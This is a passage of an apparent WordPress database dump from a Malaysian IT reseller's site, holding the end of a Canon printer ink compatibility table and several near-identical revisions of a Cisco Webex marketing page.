width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9170</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr></tbody></table>','Canon','','inherit','closed','closed','','1449-revision-v1','','','2019-09-25 10:06:29','2019-09-25 02:06:29','',1449,'https://bintara.com.my/blog/2019/09/25/1449-revision-v1/',0,'revision','',0),(3339,1,'2019-09-25 11:45:45','2019-09-25 03:45:45','<h2>CISCO WEBEX</h2>\r\n&nbsp;\r\n\r\n<h3>SIMPLY THE BEST VIDEO CONFERENCING &amp; ONLINE MEETINGS.</h3>\r\nWith Cisco Webex Meetings, joining is a breeze, audio and video are clear, and screen sharing is easier than ever. We help you forget about the technology, to focus on what matters.\r\n\r\n<img class=\"alignnone wp-image-1855 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetings_2-236x300.jpg\" alt=\"\" width=\"236\" height=\"300\" />\r\n<h4>MEET FACE TO FACE. WHEREVER YOU ARE.</h4>\r\nVideo conferencing is as simple and seamless as meeting in person. With the Webex mobile app, you can meet absolutely anywhere. Hosting is easy and joining is easier-simply click on your link to join. Include everyone, even guests.\r\n\r\n<img class=\"alignnone wp-image-1856 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetings_3-216x300.png\" alt=\"\" width=\"216\" height=\"300\" />\r\n<h4>GET ON THE SAME PAGE.</h4>\r\nSeeing is believing. Share your screen so everyone can view your document, spreadsheet, or application. You can even have the host record the meeting so others can get up to speed later.\r\n\r\n<img class=\"alignnone wp-image-1857 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetings_4-300x206.jpg\" alt=\"\" width=\"300\" height=\"206\" />\r\n<h4>INVITE ANYONE OR EVERYONE.</h4>\r\nSchedule and join meetings from where you work. Everyone you invite can join your online meeting, no matter how theyâ€™re connecting, even guests. Big crowd? Not a problem. You can meet with over 40,000 people.\r\n\r\n<img class=\"alignnone wp-image-1858 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetings_5-240x300.png\" alt=\"\" width=\"240\" height=\"300\" />\r\n<h4>CLICK OR TAP TO JOIN.</h4>\r\nEasily start or join using Productivity Tools. Now you can join a video meeting with no dialing in. You can also host or join without a download by using the Webex app.\r\n\r\n&nbsp;\r\n<h4>HOST EVENTS. TRAIN YOUR TEAM. SUPPORT YOUR CUSTOMERS.</h4>\r\n<strong>WEBINARS</strong>\r\n\r\nWith Cisco Webex Events, host interactive webinars with HD video and broadcast-quality audio for audiences up to 3,000.\r\n\r\n<strong>WEBCASTING</strong>\r\n\r\nHost large-scale virtual events for more than 40,000 participants with expertise from Cisco Webex Webcasting to ensure itâ€™s a success.\r\n\r\n<strong>ONLINE LEARNING</strong>\r\n\r\nLead live or on-demand trainings with Cisco Webex Training. Host breakout sessions, testing and automated grading with over 1,000 participants.\r\n\r\n<strong>REMOTE SUPPORT</strong>\r\n\r\nCisco Webex Support provides efficient customer service with remote desktop control and live chat.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','Cisco','','inherit','closed','closed','','1450-revision-v1','','','2019-09-25 11:45:45','2019-09-25 03:45:45','',1450,'https://bintara.com.my/blog/2019/09/25/1450-revision-v1/',0,'revision','',0),(3340,1,'2019-09-25 11:46:22','2019-09-25 03:46:22','<h2>CISCO WEBEX</h2>\r\n&nbsp;\r\n\r\n<h3>SIMPLY THE BEST VIDEO CONFERENCING &amp; ONLINE MEETINGS.</h3>\r\nWith Cisco Webex Meetings, joining is a breeze, audio and video are clear, and screen sharing is easier than ever. We help you forget about the technology, to focus on what matters.\r\n\r\n<center><img class=\"alignnone wp-image-1855 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetings_2-236x300.jpg\" alt=\"\" width=\"236\" height=\"300\" /></center>\r\n\r\n<h4>MEET FACE TO FACE. WHEREVER YOU ARE.</h4>\r\nVideo conferencing is as simple and seamless as meeting in person. With the Webex mobile app, you can meet absolutely anywhere. Hosting is easy and joining is easier-simply click on your link to join. Include everyone, even guests.\r\n\r\n<img class=\"alignnone wp-image-1856 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetings_3-216x300.png\" alt=\"\" width=\"216\" height=\"300\" />\r\n<h4>GET ON THE SAME PAGE.</h4>\r\nSeeing is believing. Share your screen so everyone can view your document, spreadsheet, or application. You can even have the host record the meeting so others can get up to speed later.\r\n\r\n<img class=\"alignnone wp-image-1857 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetings_4-300x206.jpg\" alt=\"\" width=\"300\" height=\"206\" />\r\n<h4>INVITE ANYONE OR EVERYONE.</h4>\r\nSchedule and join meetings from where you work. Everyone you invite can join your online meeting, no matter how theyâ€™re connecting, even guests. Big crowd? Not a problem. You can meet with over 40,000 people.\r\n\r\n<img class=\"alignnone wp-image-1858 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetings_5-240x300.png\" alt=\"\" width=\"240\" height=\"300\" />\r\n<h4>CLICK OR TAP TO JOIN.</h4>\r\nEasily start or join using Productivity Tools. Now you can join a video meeting with no dialing in. You can also host or join without a download by using the Webex app.\r\n\r\n&nbsp;\r\n<h4>HOST EVENTS. TRAIN YOUR TEAM. SUPPORT YOUR CUSTOMERS.</h4>\r\n<strong>WEBINARS</strong>\r\n\r\nWith Cisco Webex Events, host interactive webinars with HD video and broadcast-quality audio for audiences up to 3,000.\r\n\r\n<strong>WEBCASTING</strong>\r\n\r\nHost large-scale virtual events for more than 40,000 participants with expertise from Cisco Webex Webcasting to ensure itâ€™s a success.\r\n\r\n<strong>ONLINE LEARNING</strong>\r\n\r\nLead live or on-demand trainings with Cisco Webex Training. Host breakout sessions, testing and automated grading with over 1,000 participants.\r\n\r\n<strong>REMOTE SUPPORT</strong>\r\n\r\nCisco Webex Support provides efficient customer service with remote desktop control and live chat.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','Cisco','','inherit','closed','closed','','1450-revision-v1','','','2019-09-25 11:46:22','2019-09-25 03:46:22','',1450,'https://bintara.com.my/blog/2019/09/25/1450-revision-v1/',0,'revision','',0),(3341,1,'2019-09-25 11:51:32','2019-09-25 03:51:32','<h2>CISCO WEBEX</h2>\n&nbsp;\n\n<h3>SIMPLY THE BEST VIDEO CONFERENCING &amp; ONLINE MEETINGS.</h3>\nWith Cisco Webex Meetings, joining is a breeze, audio and video are clear, and screen sharing is easier than ever. We help you forget about the technology, to focus on what matters.\n<center><img class=\"alignnone wp-image-1855 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetings_2-236x300.jpg\" alt=\"\" width=\"236\" height=\"300\" /></center>\n\n<h3>MEET FACE TO FACE. WHEREVER YOU ARE.</h3>\nVideo conferencing is as simple and seamless as meeting in person. With the Webex mobile app, you can meet absolutely anywhere. Hosting is easy and joining is easier-simply click on your link to join. Include everyone, even guests.\n<center><img class=\"alignnone wp-image-1856 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetings_3-216x300.png\" alt=\"\" width=\"216\" height=\"300\" /></center>\n\n<h3>GET ON THE SAME PAGE.</h3>\nSeeing is believing. Share your screen so everyone can view your document, spreadsheet, or application. You can even have the host record the meeting so others can get up to speed later.\n<center><img class=\"alignnone wp-image-1857 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetings_4-300x206.jpg\" alt=\"\" width=\"300\" height=\"206\" /></center>\n\n<h3>INVITE ANYONE OR EVERYONE.</h3>\nSchedule and join meetings from where you work. Everyone you invite can join your online meeting, no matter how theyâ€™re connecting, even guests. Big crowd? Not a problem. You can meet with over 40,000 people.\n<center><img class=\"alignnone wp-image-1858 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetings_5-240x300.png\" alt=\"\" width=\"240\" height=\"300\" /></center>\n\n<h3>CLICK OR TAP TO JOIN.</h3>\nEasily start or join using Productivity Tools. Now you can join a video meeting with no dialing in. You can also host or join without a download by using the Webex app.\n\n&nbsp;\n<h3>HOST EVENTS. TRAIN YOUR TEAM. SUPPORT YOUR CUSTOMERS.</h3>\n<strong>WEBINARS</strong>\n\nWith Cisco Webex Events, host interactive webinars with HD video and broadcast-quality audio for audiences up to 3,000.\n\n<strong>WEBCASTING</strong>\n\nHost large-scale virtual events for more than 40,000 participants with expertise from Cisco Webex Webcasting to ensure itâ€™s a success.\n\n<strong>ONLINE LEARNING</strong>\n\nLead live or on-demand trainings with Cisco Webex Training. Host breakout sessions, testing and automated grading with over 1,000 participants.\n\n<strong>REMOTE SUPPORT</strong>\n\nCisco Webex Support provides efficient customer service with remote desktop control and live chat.\n\n&nbsp;\n\n[maxbutton id=\"1\" ]','Cisco','','inherit','closed','closed','','1450-autosave-v1','','','2019-09-25 11:51:32','2019-09-25 03:51:32','',1450,'https://bintara.com.my/blog/2019/09/25/1450-autosave-v1/',0,'revision','',0),(3342,1,'2019-09-25 11:50:10','2019-09-25 03:50:10','<h2>CISCO WEBEX</h2>\r\n&nbsp;\r\n\r\n<h3>SIMPLY THE BEST VIDEO CONFERENCING &amp; ONLINE MEETINGS.</h3>\r\nWith Cisco Webex Meetings, joining is a breeze, audio and video are clear, and screen sharing is easier than ever. We help you forget about the technology, to focus on what matters.\r\n<center><img class=\"alignnone wp-image-1855 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetings_2-236x300.jpg\" alt=\"\" width=\"236\" height=\"300\" /></center>\r\n\r\n<h3>MEET FACE TO FACE. WHEREVER YOU ARE.</h3>\r\nVideo conferencing is as simple and seamless as meeting in person. With the Webex mobile app, you can meet absolutely anywhere. Hosting is easy and joining is easier-simply click on your link to join. Include everyone, even guests.\r\n<center><img class=\"alignnone wp-image-1856 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetings_3-216x300.png\" alt=\"\" width=\"216\" height=\"300\" /></center>\r\n\r\n<h3>GET ON THE SAME PAGE.</h3>\r\nSeeing is believing. Share your screen so everyone can view your document, spreadsheet, or application. You can even have the host record the meeting so others can get up to speed later.\r\n<center><img class=\"alignnone wp-image-1857 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetings_4-300x206.jpg\" alt=\"\" width=\"300\" height=\"206\" /></center>\r\n\r\n<h3>INVITE ANYONE OR EVERYONE.</h3>\r\nSchedule and join meetings from where you work. Everyone you invite can join your online meeting, no matter how theyâ€™re connecting, even guests. Big crowd? Not a problem. You can meet with over 40,000 people.\r\n<center><img class=\"alignnone wp-image-1858 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetings_5-240x300.png\" alt=\"\" width=\"240\" height=\"300\" /></center>\r\n\r\n<h3>CLICK OR TAP TO JOIN.</h3>\r\nEasily start or join using Productivity Tools. Now you can join a video meeting with no dialing in. You can also host or join without a download by using the Webex app.\r\n\r\n&nbsp;\r\n<h4>HOST EVENTS. TRAIN YOUR TEAM. SUPPORT YOUR CUSTOMERS.</h4>\r\n<strong>WEBINARS</strong>\r\n\r\nWith Cisco Webex Events, host interactive webinars with HD video and broadcast-quality audio for audiences up to 3,000.\r\n\r\n<strong>WEBCASTING</strong>\r\n\r\nHost large-scale virtual events for more than 40,000 participants with expertise from Cisco Webex Webcasting to ensure itâ€™s a success.\r\n\r\n<strong>ONLINE LEARNING</strong>\r\n\r\nLead live or on-demand trainings with Cisco Webex Training. Host breakout sessions, testing and automated grading with over 1,000 participants.\r\n\r\n<strong>REMOTE SUPPORT</strong>\r\n\r\nCisco Webex Support provides efficient customer service with remote desktop control and live chat.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','Cisco','','inherit','closed','closed','','1450-revision-v1','','','2019-09-25 11:50:10','2019-09-25 03:50:10','',1450,'https://bintara.com.my/blog/2019/09/25/1450-revision-v1/',0,'revision','',0),(3343,1,'2019-09-25 11:51:44','2019-09-25 03:51:44','<h2>CISCO WEBEX</h2>\r\n&nbsp;\r\n\r\n<h3>SIMPLY THE BEST VIDEO CONFERENCING &amp; ONLINE MEETINGS.</h3>\r\nWith Cisco Webex Meetings, joining is a breeze, audio and video are clear, and screen sharing is easier than ever. We help you forget about the technology, to focus on what matters.\r\n<center><img class=\"alignnone wp-image-1855 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetings_2-236x300.jpg\" alt=\"\" width=\"236\" height=\"300\" /></center>\r\n\r\n<h3>MEET FACE TO FACE. WHEREVER YOU ARE.</h3>\r\nVideo conferencing is as simple and seamless as meeting in person. With the Webex mobile app, you can meet absolutely anywhere. Hosting is easy and joining is easier-simply click on your link to join. Include everyone, even guests.\r\n<center><img class=\"alignnone wp-image-1856 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetings_3-216x300.png\" alt=\"\" width=\"216\" height=\"300\" /></center>\r\n\r\n<h3>GET ON THE SAME PAGE.</h3>\r\nSeeing is believing. Share your screen so everyone can view your document, spreadsheet, or application. You can even have the host record the meeting so others can get up to speed later.\r\n<center><img class=\"alignnone wp-image-1857 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetings_4-300x206.jpg\" alt=\"\" width=\"300\" height=\"206\" /></center>\r\n\r\n<h3>INVITE ANYONE OR EVERYONE.</h3>\r\nSchedule and join meetings from where you work. Everyone you invite can join your online meeting, no matter how theyâ€™re connecting, even guests. Big crowd? Not a problem. You can meet with over 40,000 people.\r\n<center><img class=\"alignnone wp-image-1858 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetings_5-240x300.png\" alt=\"\" width=\"240\" height=\"300\" /></center>\r\n\r\n<h3>CLICK OR TAP TO JOIN.</h3>\r\nEasily start or join using Productivity Tools. Now you can join a video meeting with no dialing in. You can also host or join without a download by using the Webex app.\r\n\r\n&nbsp;\r\n<h3>HOST EVENTS. TRAIN YOUR TEAM. SUPPORT YOUR CUSTOMERS.</h3>\r\n\r\n<strong>WEBINARS</strong>\r\n\r\nWith Cisco Webex Events, host interactive webinars with HD video and broadcast-quality audio for audiences up to 3,000.\r\n\r\n<strong>WEBCASTING</strong>\r\n\r\nHost large-scale virtual events for more than 40,000 participants with expertise from Cisco Webex Webcasting to ensure itâ€™s a success.\r\n\r\n<strong>ONLINE LEARNING</strong>\r\n\r\nLead live or on-demand trainings with Cisco Webex Training. Host breakout sessions, testing and automated grading with over 1,000 participants.\r\n\r\n<strong>REMOTE SUPPORT</strong>\r\n\r\nCisco Webex Support provides efficient customer service with remote desktop control and live chat.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','Cisco','','inherit','closed','closed','','1450-revision-v1','','','2019-09-25 11:51:44','2019-09-25 03:51:44','',1450,'https://bintara.com.my/blog/2019/09/25/1450-revision-v1/',0,'revision','',0),(3344,1,'2019-09-25 11:52:13','2019-09-25 03:52:13','<h2>CISCO WEBEX</h2>\r\n&nbsp;\r\n\r\n<h3>SIMPLY THE BEST VIDEO CONFERENCING &amp; ONLINE MEETINGS.</h3>\r\nWith Cisco Webex Meetings, joining is a breeze, audio and video are clear, and screen sharing is easier than ever. We help you forget about the technology, to focus on what matters.\r\n<center><img class=\"alignnone wp-image-1855 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetings_2-236x300.jpg\" alt=\"\" width=\"236\" height=\"300\" /></center>\r\n\r\n<h3>MEET FACE TO FACE. WHEREVER YOU ARE.</h3>\r\nVideo conferencing is as simple and seamless as meeting in person. With the Webex mobile app, you can meet absolutely anywhere. Hosting is easy and joining is easier-simply click on your link to join. Include everyone, even guests.\r\n<center><img class=\"alignnone wp-image-1856 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetings_3-216x300.png\" alt=\"\" width=\"216\" height=\"300\" /></center>\r\n\r\n<h3>GET ON THE SAME PAGE.</h3>\r\nSeeing is believing. Share your screen so everyone can view your document, spreadsheet, or application. You can even have the host record the meeting so others can get up to speed later.\r\n<center><img class=\"alignnone wp-image-1857 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetings_4-300x206.jpg\" alt=\"\" width=\"300\" height=\"206\" /></center>\r\n\r\n<h3>INVITE ANYONE OR EVERYONE.</h3>\r\nSchedule and join meetings from where you work. Everyone you invite can join your online meeting, no matter how theyâ€™re connecting, even guests. Big crowd? Not a problem. You can meet with over 40,000 people.\r\n<center><img class=\"alignnone wp-image-1858 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetings_5-240x300.png\" alt=\"\" width=\"240\" height=\"300\" /></center>\r\n\r\n<h3>CLICK OR TAP TO JOIN.</h3>\r\nEasily start or join using Productivity Tools. Now you can join a video meeting with no dialing in. You can also host or join without a download by using the Webex app.\r\n\r\n&nbsp;\r\n<h3>HOST EVENTS. TRAIN YOUR TEAM. SUPPORT YOUR CUSTOMERS.</h3>\r\n\r\n&nbsp;\r\n<strong>WEBINARS</strong>\r\n\r\nWith Cisco Webex Events, host interactive webinars with HD video and broadcast-quality audio for audiences up to 3,000.\r\n\r\n<strong>WEBCASTING</strong>\r\n\r\nHost large-scale virtual events for more than 40,000 participants with expertise from Cisco Webex Webcasting to ensure itâ€™s a success.\r\n\r\n<strong>ONLINE LEARNING</strong>\r\n\r\nLead live or on-demand trainings with Cisco Webex Training. Host breakout sessions, testing and automated grading with over 1,000 participants.\r\n\r\n<strong>REMOTE SUPPORT</strong>\r\n\r\nCisco Webex Support provides efficient customer service with remote desktop control and live chat.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','Cisco','','inherit','closed','closed','','1450-revision-v1','','','2019-09-25 11:52:13','2019-09-25 03:52:13','',1450,'https://bintara.com.my/blog/2019/09/25/1450-revision-v1/',0,'revision','',0),(3345,1,'2019-09-25 11:52:53','2019-09-25 03:52:53','<h2>CISCO WEBEX</h2>\r\n&nbsp;\r\n\r\n<h3>SIMPLY THE BEST VIDEO CONFERENCING &amp; ONLINE MEETINGS.</h3>\r\nWith Cisco Webex Meetings, joining is a breeze, audio and video are clear, and screen sharing is easier than ever. We help you forget about the technology, to focus on what matters.\r\n<center><img class=\"alignnone wp-image-1855 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetings_2-236x300.jpg\" alt=\"\" width=\"236\" height=\"300\" /></center>\r\n\r\n<h3>MEET FACE TO FACE. WHEREVER YOU ARE.</h3>\r\nVideo conferencing is as simple and seamless as meeting in person. With the Webex mobile app, you can meet absolutely anywhere. Hosting is easy and joining is easier-simply click on your link to join. Include everyone, even guests.\r\n<center><img class=\"alignnone wp-image-1856 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetings_3-216x300.png\" alt=\"\" width=\"216\" height=\"300\" /></center>\r\n\r\n<h3>GET ON THE SAME PAGE.</h3>\r\nSeeing is believing. Share your screen so everyone can view your document, spreadsheet, or application. You can even have the host record the meeting so others can get up to speed later.\r\n<center><img class=\"alignnone wp-image-1857 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetings_4-300x206.jpg\" alt=\"\" width=\"300\" height=\"206\" /></center>\r\n\r\n<h3>INVITE ANYONE OR EVERYONE.</h3>\r\nSchedule and join meetings from where you work. Everyone you invite can join your online meeting, no matter how theyâ€™re connecting, even guests. Big crowd? Not a problem. You can meet with over 40,000 people.\r\n<center><img class=\"alignnone wp-image-1858 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetings_5-240x300.png\" alt=\"\" width=\"240\" height=\"300\" /></center>\r\n\r\n<h3>CLICK OR TAP TO JOIN.</h3>\r\nEasily start or join using Productivity Tools. Now you can join a video meeting with no dialing in. You can also host or join without a download by using the Webex app.\r\n\r\n&nbsp;\r\n<h3>HOST EVENTS. TRAIN YOUR TEAM. SUPPORT YOUR CUSTOMERS.</h3>\r\n\r\n&nbsp;\r\n<h4><strong>WEBINARS</strong></h4>\r\n\r\nWith Cisco Webex Events, host interactive webinars with HD video and broadcast-quality audio for audiences up to 3,000.\r\n\r\n<strong>WEBCASTING</strong>\r\n\r\nHost large-scale virtual events for more than 40,000 participants with expertise from Cisco Webex Webcasting to ensure itâ€™s a success.\r\n\r\n<strong>ONLINE LEARNING</strong>\r\n\r\nLead live or on-demand trainings with Cisco Webex Training. Host breakout sessions, testing and automated grading with over 1,000 participants.\r\n\r\n<strong>REMOTE SUPPORT</strong>\r\n\r\nCisco Webex Support provides efficient customer service with remote desktop control and live chat.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','Cisco','','inherit','closed','closed','','1450-revision-v1','','','2019-09-25 11:52:53','2019-09-25 03:52:53','',1450,'https://bintara.com.my/blog/2019/09/25/1450-revision-v1/',0,'revision','',0),(3346,1,'2019-09-25 11:53:35','2019-09-25 03:53:35','<h2>CISCO WEBEX</h2>\r\n&nbsp;\r\n\r\n<h3>SIMPLY THE BEST VIDEO CONFERENCING &amp; ONLINE MEETINGS.</h3>\r\nWith Cisco Webex Meetings, joining is a breeze, audio and video are clear, and screen sharing is easier than ever. We help you forget about the technology, to focus on what matters.\r\n<center><img class=\"alignnone wp-image-1855 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetings_2-236x300.jpg\" alt=\"\" width=\"236\" height=\"300\" /></center>\r\n\r\n<h3>MEET FACE TO FACE. WHEREVER YOU ARE.</h3>\r\nVideo conferencing is as simple and seamless as meeting in person. With the Webex mobile app, you can meet absolutely anywhere. Hosting is easy and joining is easier-simply click on your link to join. Include everyone, even guests.\r\n<center><img class=\"alignnone wp-image-1856 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetings_3-216x300.png\" alt=\"\" width=\"216\" height=\"300\" /></center>\r\n\r\n<h3>GET ON THE SAME PAGE.</h3>\r\nSeeing is believing. Share your screen so everyone can view your document, spreadsheet, or application. You can even have the host record the meeting so others can get up to speed later.\r\n<center><img class=\"alignnone wp-image-1857 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetings_4-300x206.jpg\" alt=\"\" width=\"300\" height=\"206\" /></center>\r\n\r\n<h3>INVITE ANYONE OR EVERYONE.</h3>\r\nSchedule and join meetings from where you work. Everyone you invite can join your online meeting, no matter how theyâ€™re connecting, even guests. Big crowd? Not a problem. You can meet with over 40,000 people.\r\n<center><img class=\"alignnone wp-image-1858 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetings_5-240x300.png\" alt=\"\" width=\"240\" height=\"300\" /></center>\r\n\r\n<h3>CLICK OR TAP TO JOIN.</h3>\r\nEasily start or join using Productivity Tools. Now you can join a video meeting with no dialing in. You can also host or join without a download by using the Webex app.\r\n\r\n&nbsp;\r\n<h3>HOST EVENTS. TRAIN YOUR TEAM. SUPPORT YOUR CUSTOMERS.</h3>\r\n\r\n&nbsp;\r\n<h4><strong>WEBINARS</strong></h4>\r\n\r\nWith Cisco Webex Events, host interactive webinars with HD video and broadcast-quality audio for audiences up to 3,000.\r\n\r\n<h4><strong>WEBCASTING</strong></h4>\r\n\r\nHost large-scale virtual events for more than 40,000 participants with expertise from Cisco Webex Webcasting to ensure itâ€™s a success.\r\n\r\n<h4><strong>ONLINE LEARNING</strong></h4>\r\n\r\nLead live or on-demand trainings with Cisco Webex Training. Host breakout sessions, testing and automated grading with over 1,000 participants.\r\n\r\n<h4><strong>REMOTE SUPPORT</strong></h4>\r\n\r\nCisco Webex Support provides efficient customer service with remote desktop control and live chat.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','Cisco','','inherit','closed','closed','','1450-revision-v1','','','2019-09-25 11:53:35','2019-09-25 03:53:35','',1450,'https://bintara.com.my/blog/2019/09/25/1450-revision-v1/',0,'revision','',0),(3347,1,'2019-09-25 11:54:04','2019-09-25 03:54:04','<h2>CISCO WEBEX</h2>\r\n&nbsp;\r\n\r\n<h3>SIMPLY THE BEST VIDEO CONFERENCING &amp; ONLINE MEETINGS.</h3>\r\nWith Cisco Webex Meetings, joining is a breeze, audio and video are clear, and screen sharing is easier than ever. We help you forget about the technology, to focus on what matters.\r\n<center><img class=\"alignnone wp-image-1855 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetings_2-236x300.jpg\" alt=\"\" width=\"236\" height=\"300\" /></center>\r\n\r\n<h3>MEET FACE TO FACE. WHEREVER YOU ARE.</h3>\r\nVideo conferencing is as simple and seamless as meeting in person. With the Webex mobile app, you can meet absolutely anywhere. Hosting is easy and joining is easier-simply click on your link to join. Include everyone, even guests.\r\n<center><img class=\"alignnone wp-image-1856 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetings_3-216x300.png\" alt=\"\" width=\"216\" height=\"300\" /></center>\r\n\r\n<h3>GET ON THE SAME PAGE.</h3>\r\nSeeing is believing. Share your screen so everyone can view your document, spreadsheet, or application. You can even have the host record the meeting so others can get up to speed later.\r\n<center><img class=\"alignnone wp-image-1857 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetings_4-300x206.jpg\" alt=\"\" width=\"300\" height=\"206\" /></center>\r\n\r\n<h3>INVITE ANYONE OR EVERYONE.</h3>\r\nSchedule and join meetings from where you work. Everyone you invite can join your online meeting, no matter how theyâ€™re connecting, even guests. Big crowd? Not a problem. You can meet with over 40,000 people.\r\n<center><img class=\"alignnone wp-image-1858 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetings_5-240x300.png\" alt=\"\" width=\"240\" height=\"300\" /></center>\r\n\r\n<h3>CLICK OR TAP TO JOIN.</h3>\r\nEasily start or join using Productivity Tools. Now you can join a video meeting with no dialing in. You can also host or join without a download by using the Webex app.\r\n\r\n&nbsp;\r\n<h3>HOST EVENTS. TRAIN YOUR TEAM. SUPPORT YOUR CUSTOMERS.</h3>\r\n\r\n&nbsp;\r\n<h4><strong>WEBINARS</strong></h4>\r\n\r\nWith Cisco Webex Events, host interactive webinars with HD video and broadcast-quality audio for audiences up to 3,000.\r\n\r\n<h4><strong>WEBCASTING</strong></h4>\r\n\r\nHost large-scale virtual events for more than 40,000 participants with expertise from Cisco Webex Webcasting to ensure itâ€™s a success.\r\n\r\n<h4><strong>ONLINE LEARNING</strong></h4>\r\n\r\nLead live or on-demand trainings with Cisco Webex Training. Host breakout sessions, testing and automated grading with over 1,000 participants.\r\n\r\n<h4><strong>REMOTE SUPPORT</strong></h4>\r\n\r\nCisco Webex Support provides efficient customer service with remote desktop control and live chat.\r\n\r\n&nbsp;\r\n\r\n<center>[maxbutton id=\"1\"]</center>','Cisco','','inherit','closed','closed','','1450-revision-v1','','','2019-09-25 11:54:04','2019-09-25 03:54:04','',1450,'https://bintara.com.my/blog/2019/09/25/1450-revision-v1/',0,'revision','',0),(3348,1,'2019-09-25 11:56:10','2019-09-25 03:56:10','<h2>CorelDRAW Graphics Suite 2018</h2>\r\n<h4>Graphic design 